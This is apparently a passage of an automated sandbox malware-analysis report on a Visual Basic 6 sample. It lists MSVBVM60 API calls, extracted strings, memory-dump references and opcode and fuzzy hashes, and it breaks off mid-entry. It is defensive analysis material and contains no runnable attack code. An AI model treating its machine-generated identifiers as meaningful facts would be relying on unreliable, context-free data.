__vbaStrMove.MSVBVM60(00000000), ref: 004338EC
__vbaFreeStr.MSVBVM60 ref: 0043391F
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0043393B
__vbaFreeVar.MSVBVM60 ref: 00433949
__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 00433961
__vbaObjSet.MSVBVM60(?,00000000), ref: 0043397C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D08,00000130), ref: 004339A1
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004339B7
__vbaStrVarMove.MSVBVM60(?), ref: 004339C6
__vbaStrMove.MSVBVM60(?), ref: 004339D3
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,00000710), ref: 00433A0B
__vbaFreeStr.MSVBVM60(00000000,00401198,00432788,00000710), ref: 00433A1D
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00433A32
__vbaFreeVar.MSVBVM60(00401198,00432788,00000710), ref: 00433A40
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,00000708), ref: 00433A61
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,00000714), ref: 00433AA9
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,00000718), ref: 00433AC3
__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 00433ADB
__vbaObjSet.MSVBVM60(?,00000000), ref: 00433AF6
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432CE8,000000A8), ref: 00433B1F
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,00000704), ref: 00433B77
__vbaFreeObj.MSVBVM60(00000000,00401198,00432788,00000704), ref: 00433B82
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,0000070C), ref: 00433BA3
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,000006FC), ref: 00433BC4
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,00000704), ref: 00433C1A
__vbaStrCopy.MSVBVM60(00000000,00401198,00432788,00000704), ref: 00433C2A
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,00000710), ref: 00433C5D
__vbaFreeStr.MSVBVM60(00000000,00401198,00432788,00000710), ref: 00433C68
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,0000071C), ref: 00433C9F
__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 00433CB7
__vbaObjSet.MSVBVM60(?,00000000), ref: 00433CD2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D60,00000058), ref: 00433CF5
__vbaFreeObj.MSVBVM60 ref: 00433D27
__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 00433D3F
__vbaObjSet.MSVBVM60(?,00000000), ref: 00433D5A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D70,000001D0), ref: 00433D83
__vbaFreeObj.MSVBVM60 ref: 00433DAE
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,00000708), ref: 00433DCF
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,00000700), ref: 00433DE9
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,000006F8), ref: 00433E18
__vbaStrCopy.MSVBVM60(00000000,00401198,00432788,000006F8), ref: 00433E28
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,00000710), ref: 00433E5B
__vbaFreeStr.MSVBVM60(00000000,00401198,00432788,00000710), ref: 00433E66
__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 00433E7E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00433E99
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432CE8,000000F0), ref: 00433EC2
__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 00433EDA
__vbaObjSet.MSVBVM60(?,00000000), ref: 00433EF5
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D70,000001D0), ref: 00433F1E
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,00000714), ref: 00433F69
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00433F7E
__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 00433FE8
__vbaObjSet.MSVBVM60(?,00000000), ref: 00434003
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432CF8,00000110), ref: 0043402C
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,0000071C), ref: 00434064
__vbaFreeObj.MSVBVM60(00000000,00401198,00432788,0000071C), ref: 0043406F
__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 00434087
__vbaObjSet.MSVBVM60(?,00000000), ref: 004340A2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432CF8,00000130), ref: 004340CB
__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 004340E3
__vbaObjSet.MSVBVM60(?,00000000), ref: 004340FE
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432CF8,00000130), ref: 00434127
__vbaStrMove.MSVBVM60(00000000,00000000,00432CF8,00000130), ref: 0043413F
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0043417B
__vbaFreeObjList.MSVBVM60(00000002,?,?,00000002,?,?), ref: 00434190
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,00000708), ref: 004341B4
__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 004341CC
__vbaObjSet.MSVBVM60(?,00000000), ref: 004341E7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D70,00000198), ref: 00434210
__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 00434228
__vbaObjSet.MSVBVM60(?,00000000), ref: 00434243
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432CF8,00000190), ref: 0043426C
__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 00434284
__vbaObjSet.MSVBVM60(?,00000000), ref: 0043429F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432CF8,00000198), ref: 004342C8
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,00000714), ref: 00434315
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00434331
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,00000700), ref: 0043434E
__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 00434366
__vbaObjSet.MSVBVM60(?,00000000), ref: 00434381
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432CF8,00000190), ref: 004343AA
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,00000704), ref: 00434402
__vbaFreeObj.MSVBVM60(00000000,00401198,00432788,00000704), ref: 0043440D
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,00000700), ref: 00434427
__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 0043443F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0043445A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D70,00000218), ref: 00434483
__vbaStrMove.MSVBVM60(00000000,00000000,00432D70,00000218), ref: 0043449B
__vbaFreeStr.MSVBVM60 ref: 004344CC
__vbaFreeObj.MSVBVM60 ref: 004344D7
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,0000071C), ref: 0043450E
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,00000718), ref: 00434528
__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 00434540
__vbaObjSet.MSVBVM60(?,00000000), ref: 0043455B
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D08,00000180), ref: 00434584
__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 0043459C
__vbaObjSet.MSVBVM60(?,00000000), ref: 004345B7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D70,000000E0), ref: 004345E0
__vbaHresultCheckObj.MSVBVM60(00000000,00401198,00432788,0000071C), ref: 00434619
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0043462E

Strings

enteromesenteric, xrefs: 00433E1D
Fejlstatistik8, xrefs: 004338FE
D, xrefs: 004344B6
pKbU, xrefs: 00433BDE, 00433BE4
HETEROINTOXICATION, xrefs: 004344A9
untransplanted, xrefs: 00433C1F
`Sb, xrefs: 00433666, 00433726, 00433735, 0043377D, 00433786, 00433795, 00433809, 00433812, 00433821, 0043386D, 00433876, 00433885, 0043394E, 00433957, 00433966, 00433AC8, 00433AD1, 00433AE0, 00433CA4, 00433CAD, 00433CBC, 00433D2C, 00433D35, 00433D44, 00433E6B, 00433E74, 00433E83, 00433EC7, 00433ED0, 00433EDF, 00433FD5, 00433FDE, 00433FED, 00434074, 0043407D, 0043408C, 004340D0, 004340D9, 004340E8, 004341B9, 004341C2, 004341D1, 00434215, 0043421E, 0043422D, 00434271, 0043427A, 00434289, 00434353, 0043435C, 0043436B, 0043442C, 00434435, 00434444, 0043452D, 00434536, 00434545, 00434589, 00434592, 004345A1

Memory Dump Source

Source File: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2365766403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2365800277.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2365808830.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckHresult$Free$New2$List$Move$CallCopyLate
String ID: Fejlstatistik8$HETEROINTOXICATION$`Sb$enteromesenteric$pKbU$untransplanted$D
API String ID: 4096466292-1319747068
Opcode ID: 50f176b28eb568baf250de7bfd4b04bb8d25a0c8eb2fa5e31073e6d4b2657893
Instruction ID: b228ce87f7abde1b46aad1bed7f41f4f117141d907b66e7f5f86440591ccd116
Opcode Fuzzy Hash: 50f176b28eb568baf250de7bfd4b04bb8d25a0c8eb2fa5e31073e6d4b2657893
Instruction Fuzzy Hash: D3A241B0940219ABDB25DB65CC99FEA77BCAF08744F0014EAF149E71A1DB786B44CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00435B46, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

__vbaR8Str.MSVBVM60(00432F40,?,?,?,?,?,?,?,?,?,004012D6), ref: 00435B8B
__vbaFPFix.MSVBVM60(00432F40,?,?,?,?,?,?,?,?,?,004012D6), ref: 00435B90
__vbaNew2.MSVBVM60(0043199C,`Sb,00432F40,?,?,?,?,?,?,?,?,?,004012D6), ref: 00435BB3
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,004012D6), ref: 00435BCB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D08,00000120,?,?,?,?,?,?,?,?,?,004012D6), ref: 00435BF1
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,004012D6), ref: 00435BFF

Strings

`Sb, xrefs: 00435BA0, 00435BA9, 00435BB8

Memory Dump Source

Source File: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2365766403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2365800277.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2365808830.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID: `Sb
API String ID: 1645334062-2243697873
Opcode ID: 5bf79b992d1864ab63ec5188589fc31ccbeab3262971a6a48fa4b78e25c16587
Instruction ID: a91470af7f079c1682a62030a7b22422c506b51593a444671756e0bb7d2b609d
Opcode Fuzzy Hash: 5bf79b992d1864ab63ec5188589fc31ccbeab3262971a6a48fa4b78e25c16587
Instruction Fuzzy Hash: EB1172B4940608ABCB10EF95C945E9EBBB8FF5C744F10546BF451F72A1C77C55018BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401470, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6%*), ref: 00401475

Strings

VB5!6%*, xrefs: 00401470

Memory Dump Source

Source File: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2365766403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2365800277.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2365808830.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: #100
String ID: VB5!6%*
API String ID: 1341478452-4246263594
Opcode ID: 17067581b7d27bfbfa978426e6faf9106fddf5ce19447f27e37080abef5f32d0
Instruction ID: b1e19180af3ab2ec1248aed23a1bce84dea529df0f229db8e130a7f4247806d4
Opcode Fuzzy Hash: 17067581b7d27bfbfa978426e6faf9106fddf5ce19447f27e37080abef5f32d0
Instruction Fuzzy Hash: F501EE6154E7C28FD7135A708DA15807FB1AE932A472B06DBC0C1CF4B3D62E0D4ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00221774, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2365637864.0000000000220000.00000020.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa026bf46310cc318358c9191f03f3937c34a40974dc8c0d4a1f86eaa2d66bf1
Instruction ID: 4ea9955e8df653894d3325e3fbf68bb3d794a54c6eb6172dee1b62118f731a67
Opcode Fuzzy Hash: fa026bf46310cc318358c9191f03f3937c34a40974dc8c0d4a1f86eaa2d66bf1
Instruction Fuzzy Hash: 51D05EB2308200BFD2448758CC06ED677E8EBC9220F0488B9F148CB244D625AD118752

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 002A341B, Relevance: 8.6, Strings: 6, Instructions: 1057COMMON

Download Yara Rule

Strings

', xrefs: 002A436A
$}, xrefs: 002A34A2
#'_, xrefs: 002A445E
\e, xrefs: 002A9400
70};, xrefs: 002A43B9
n"}-, xrefs: 002A442C

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $}$#'_$70};$n"}-$\e$'
API String ID: 0-2086826316
Opcode ID: d66c1e30be38f01f21bf4c6d8c4f7b36278542410c06cc56e785ffd8fbae1c2c
Instruction ID: ab5b8dada7bbf46c77ab01623294859acc1cf3c79027febe75a73d190189662f
Opcode Fuzzy Hash: d66c1e30be38f01f21bf4c6d8c4f7b36278542410c06cc56e785ffd8fbae1c2c
Instruction Fuzzy Hash: 2992217161034A8FDB349F38CD987DA7BA2FF96350F95812EDC899B214D7348A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 002A2958, Relevance: 6.5, Strings: 4, Instructions: 1495COMMON

Download Yara Rule

Strings

', xrefs: 002A436A
#'_, xrefs: 002A445E
70};, xrefs: 002A43B9
n"}-, xrefs: 002A442C

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #'_$70};$n"}-$'
API String ID: 0-625377185
Opcode ID: f4fb9d2f47bde71aaee264d0634ea0d166c86090c9610efed77bc1e03b4745df
Instruction ID: e52fb6ebf628b51e7f5d8f7a48f301b9b30a5aaddff7de4566cbfd6e748e3684
Opcode Fuzzy Hash: f4fb9d2f47bde71aaee264d0634ea0d166c86090c9610efed77bc1e03b4745df
Instruction Fuzzy Hash: A5C2127160034A9FDB34DF28CD947DA77A2FF9A350F95422EDC899B200D7709A95CB81

Uniqueness

Uniqueness Score: -1.00%

Function 002A1B5F, Relevance: 6.0, Strings: 4, Instructions: 995COMMON

Download Yara Rule

Strings

', xrefs: 002A436A
#'_, xrefs: 002A445E
70};, xrefs: 002A43B9
n"}-, xrefs: 002A442C

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #'_$70};$n"}-$'
API String ID: 0-625377185
Opcode ID: f0defecd605154afdfdc76825790728c665f0ae56526d22adc7683de99943633
Instruction ID: da8a5049f553b3d4c37d3d65499d8987f9b01fd0c6b0bc4785f91c05a4eaa356
Opcode Fuzzy Hash: f0defecd605154afdfdc76825790728c665f0ae56526d22adc7683de99943633
Instruction Fuzzy Hash: 57821F7160034A9FDF349F28CD957DA7BA2FF96350F95812EDC899B214D7308A86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 002A7036, Relevance: 5.8, Strings: 4, Instructions: 839COMMON

Download Yara Rule

Strings

', xrefs: 002A436A
#'_, xrefs: 002A445E
70};, xrefs: 002A43B9
n"}-, xrefs: 002A442C

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #'_$70};$n"}-$'
API String ID: 0-625377185
Opcode ID: 3e94255b96c10bff696d48ea72b79f65340374fadc7020253e62fe7077ab8279
Instruction ID: dd61d80a03a11358bef533468eb25098583b9371fb2d13378dbaab40bd0c8c23
Opcode Fuzzy Hash: 3e94255b96c10bff696d48ea72b79f65340374fadc7020253e62fe7077ab8279
Instruction Fuzzy Hash: 16722E7160034A8FDF349F38C9957DA7BA2FF96350F95812EDC899B210D7748A86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 002A1B1A, Relevance: 5.8, Strings: 4, Instructions: 812COMMON

Download Yara Rule

Strings

', xrefs: 002A436A
#'_, xrefs: 002A445E
70};, xrefs: 002A43B9
n"}-, xrefs: 002A442C

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #'_$70};$n"}-$'
API String ID: 0-625377185
Opcode ID: 0a57482d6fe36e6a6f92ef3240b4c0241f6280d8bdc95e1060d068460fdc0782
Instruction ID: da97e5d96afeca932f0c41cf334eb95811bd589811e65ffb28264e07644f0b42
Opcode Fuzzy Hash: 0a57482d6fe36e6a6f92ef3240b4c0241f6280d8bdc95e1060d068460fdc0782
Instruction Fuzzy Hash: 39622F7160034A9FDF349F38C9957DA7BA2FF96340F95812EDC899B210D7748A86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 002A4071, Relevance: 5.7, Strings: 4, Instructions: 744COMMON

Download Yara Rule

Strings

', xrefs: 002A436A
#'_, xrefs: 002A445E
70};, xrefs: 002A43B9
n"}-, xrefs: 002A442C

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #'_$70};$n"}-$'
API String ID: 0-625377185
Opcode ID: 4d90e873bed4632e1ca14be09419150594f11d1629dfc3833adacda1ab199051
Instruction ID: a4cef0fbd305e00e203e85e717627d6fe7c0a3b0e36fd7e6fdf28dae2b032485
Opcode Fuzzy Hash: 4d90e873bed4632e1ca14be09419150594f11d1629dfc3833adacda1ab199051
Instruction Fuzzy Hash: C252207160034A9FDF349F38CD947DA7BA2FF96350F95812ADC899B214D7348A86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 002A42CD, Relevance: 5.6, Strings: 4, Instructions: 602COMMON

Download Yara Rule

Strings

', xrefs: 002A436A
#'_, xrefs: 002A445E
70};, xrefs: 002A43B9
n"}-, xrefs: 002A442C

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #'_$70};$n"}-$'
API String ID: 0-625377185
Opcode ID: b5570d29e6502f9f68a6d4c3105f3e8cb485794337997e834e2d746068791a6d
Instruction ID: a5995ef793faa5c1e0a7f5f811c22130fb86eb27a6364192caeb227f59e32aa7
Opcode Fuzzy Hash: b5570d29e6502f9f68a6d4c3105f3e8cb485794337997e834e2d746068791a6d
Instruction Fuzzy Hash: 39323E71A0034A9FDF349F38C9947DA7BA2FF56350F95812ADC89DB210D7748A85CB82

Uniqueness

Uniqueness Score: -1.00%

Function 002A6F9E, Relevance: 5.1, Strings: 4, Instructions: 136COMMON

Download Yara Rule

Strings

', xrefs: 002A436A
#'_, xrefs: 002A445E
70};, xrefs: 002A43B9
n"}-, xrefs: 002A442C

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #'_$70};$n"}-$'
API String ID: 0-625377185
Opcode ID: e7403c74dbdf7c346054e0a148193e4991c07114440fe78d85a946cf1ee0f06d
Instruction ID: 7d41fb3011ffc23d976ce6e47a15f33dca5f3784d9ab6236ab37728ab140eb3f
Opcode Fuzzy Hash: e7403c74dbdf7c346054e0a148193e4991c07114440fe78d85a946cf1ee0f06d
Instruction Fuzzy Hash: 8641AB396143078FDB214E78CA943D677A2EF67370FA54135ED85AB382DBA18C458701

Uniqueness

Uniqueness Score: -1.00%

Function 002A7D52, Relevance: 4.4, Strings: 3, Instructions: 635COMMON

Download Yara Rule

Strings

-, xrefs: 002A7E22
ld %, xrefs: 002A85F3
Mki, xrefs: 002A8141

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Mki$ld %$-
API String ID: 0-2326836923
Opcode ID: 521aa326050d2803bc7f58cb24cf03a90ac63ad54eefb3fdad55b3c52cf6b59e
Instruction ID: 69c5c6226ae9beab5ba159ca5d47df4cb8495e093283c98e22319ef857dbdc70
Opcode Fuzzy Hash: 521aa326050d2803bc7f58cb24cf03a90ac63ad54eefb3fdad55b3c52cf6b59e
Instruction Fuzzy Hash: 32324C716083828FDF35DF38C8987DA7BD2AF56310F9981AACC898F296D7348546C712

Uniqueness

Uniqueness Score: -1.00%

Function 002A0EFE, Relevance: 4.0, Strings: 3, Instructions: 277COMMON

Download Yara Rule

Strings

-Y, xrefs: 002A10AB
8\, xrefs: 002A0F70
{, xrefs: 002A108B

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: -Y$8\${
API String ID: 0-1226747229
Opcode ID: e75d7a33062bfc01225a882d8c6a3b698088c97c60c4fdd07e381ec91fe1eaf7
Instruction ID: d0c8b5a32f27d31db6a52cc63743af1bdd8948911242e12f9ca5d2dd83b2b013
Opcode Fuzzy Hash: e75d7a33062bfc01225a882d8c6a3b698088c97c60c4fdd07e381ec91fe1eaf7
Instruction Fuzzy Hash: 04A1AD7161838B9FDF309E388C947DE3BA1AF53320F95812EDC89DB245D7318A958B42

Uniqueness

Uniqueness Score: -1.00%

Function 002A43F1, Relevance: 3.0, Strings: 2, Instructions: 550COMMON

Download Yara Rule

Strings

#'_, xrefs: 002A445E
n"}-, xrefs: 002A442C

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #'_$n"}-
API String ID: 0-1429538479
Opcode ID: 55e3eab8da51181b28fc870d2298c449e90f0edddf28b30037536e75e60b053c
Instruction ID: e2132b84decdf7994b03538196ca73ae710a125ae14e25710d95db7cc32b33e5
Opcode Fuzzy Hash: 55e3eab8da51181b28fc870d2298c449e90f0edddf28b30037536e75e60b053c
Instruction Fuzzy Hash: 90222071A003899FDF749E38CD947DA3BA2EF96350F95812ADC89DB214D7708A85CF81

Uniqueness

Uniqueness Score: -1.00%

Function 002A0FB5, Relevance: 2.7, Strings: 2, Instructions: 182COMMON

Download Yara Rule

Strings

-Y, xrefs: 002A10AB
{, xrefs: 002A108B

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: -Y${
API String ID: 0-756523511
Opcode ID: 9be6343ef3608db4a8acf3744ae12c79dad30be09171d2304a628deb1571e6de
Instruction ID: 6dae1b9892d7b73f89fe7a1b25578f437df685a95fb60bf95cf64d9ed744c351
Opcode Fuzzy Hash: 9be6343ef3608db4a8acf3744ae12c79dad30be09171d2304a628deb1571e6de
Instruction Fuzzy Hash: 2F61CF716193CB9FDB319E388C553DD7BA1AF03320F89426DDCC98B585D73149958B42

Uniqueness

Uniqueness Score: -1.00%

Function 002A100E, Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

-Y, xrefs: 002A10AB
{, xrefs: 002A108B

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: -Y${
API String ID: 0-756523511
Opcode ID: 38803d9d20833795e957cb7323829869cfd29b249446a802a0ccef5c5a59c26c
Instruction ID: 76323069abaae2aa69c9e957e32a6a9915dcf26a6cbf72a9f248d03e775e186c
Opcode Fuzzy Hash: 38803d9d20833795e957cb7323829869cfd29b249446a802a0ccef5c5a59c26c
Instruction Fuzzy Hash: 5351AC71A096CB9FDB319E3888593DD7F61AF13320F98826ECCC98B586D3314A558B42

Uniqueness

Uniqueness Score: -1.00%

Function 002A7F03, Relevance: 1.5, Strings: 1, Instructions: 271COMMON

Download Yara Rule

Strings

Mki, xrefs: 002A8141

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Mki
API String ID: 0-1481786061
Opcode ID: 293f1f9fab9f1b47a9fdbae4a1b0212b3442d614477a269b65c1eedb121c92e2
Instruction ID: 7d8ad54f137fd602b84c9656202b7eca74ffce3ee9b159561fd338047def49f9
Opcode Fuzzy Hash: 293f1f9fab9f1b47a9fdbae4a1b0212b3442d614477a269b65c1eedb121c92e2
Instruction Fuzzy Hash: BCA13A716183C68FDF318F388C987DA7BD29F53360F9981AAC8894F29AD7358545C712

Uniqueness

Uniqueness Score: -1.00%

Function 002A7F6D, Relevance: 1.5, Strings: 1, Instructions: 251COMMON

Download Yara Rule

Strings

Mki, xrefs: 002A8141

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Mki
API String ID: 0-1481786061
Opcode ID: b69abde1d69ffd79621a0d625c79e67d9d535ab4974c0d5f6b199e12640309e7
Instruction ID: 64ea6251bf84f6c9066feb958ee9732c33beba0c08658c5feb59115c7123a698
Opcode Fuzzy Hash: b69abde1d69ffd79621a0d625c79e67d9d535ab4974c0d5f6b199e12640309e7
Instruction Fuzzy Hash: 989169719583C68FDF318F348C983DA7BE2AF62350F9881AACC894F29AD7358545C712

Uniqueness

Uniqueness Score: -1.00%

Function 002A80D4, Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

Mki, xrefs: 002A8141

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Mki
API String ID: 0-1481786061
Opcode ID: 1441e2065cd00e1a3496fcde5b5009e24ca371c9d9bc2f75414f5e3e25875d30
Instruction ID: 0bf43661f89057367ddfbc20d8986de7c48a4a34cd0cfda074414fb1908cd350
Opcode Fuzzy Hash: 1441e2065cd00e1a3496fcde5b5009e24ca371c9d9bc2f75414f5e3e25875d30
Instruction Fuzzy Hash: 455107729443858FDF34DF348C987DABBD2AFA2350F95816ACC8A4F299DB344546C712

Uniqueness

Uniqueness Score: -1.00%

Function 002A72C3, Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

`, xrefs: 002A739D

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: 78ad77c196bc821a872f8ed8d64b43b3a9c6a59741827964de14ba69ae8439f8
Instruction ID: 70ff8bfed0baaea92e900fc3395d656fcc54a8bb832b6ac125daa26bc7b6ee23
Opcode Fuzzy Hash: 78ad77c196bc821a872f8ed8d64b43b3a9c6a59741827964de14ba69ae8439f8
Instruction Fuzzy Hash: 03215A7661478ACFFB388E368D657CB37B36FE6350F06801ACC495B185DB70971A8A06

Uniqueness

Uniqueness Score: -1.00%

Function 002A29B0, Relevance: .4, Instructions: 429COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28138cdc3fe106cab0eb3f9173bf5c47a79a811342be200f44d3cdbba9c46d42
Instruction ID: 81a80a0448db836ef85ce1f9bb282a9c73cfa699696f9f50f0d42a776bd35338
Opcode Fuzzy Hash: 28138cdc3fe106cab0eb3f9173bf5c47a79a811342be200f44d3cdbba9c46d42
Instruction Fuzzy Hash: BD021271A0074ADFDB34CF39C894BDAB7A2FF59350F99422ADC8C97204D771A9518B90

Uniqueness

Uniqueness Score: -1.00%

Function 002A2940, Relevance: .4, Instructions: 425COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e644ca7f7980893ee48b0e41c72ff9ad7f7e7e306de08e18c3fe264db7f04670
Instruction ID: b0201a9bfe72f3afe1ff26be0692656910106207e9ff839049b0f955ee48f3c7
